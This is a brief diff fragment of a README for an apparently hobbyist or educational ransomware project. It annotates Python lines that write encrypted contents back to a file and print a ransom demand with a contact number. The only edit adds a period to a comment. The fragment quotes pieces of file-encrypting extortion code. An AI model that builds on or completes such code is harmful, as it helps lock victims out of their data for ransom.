AdrianAgulto/Ransomware/README.md

 thefile.write(contents_encrypted) // Writes the "contents_encrypted" to the file.

 print("All of your files have been encrypted.
-Contact 890-589-5542 to decrypt your data, for a price") // This is displayed in the terminal when the Python script is executed
+Contact 890-589-5542 to decrypt your data, for a price") // This is displayed in the terminal when the Python script is executed.

 <h3>Decryption Sequence</h3>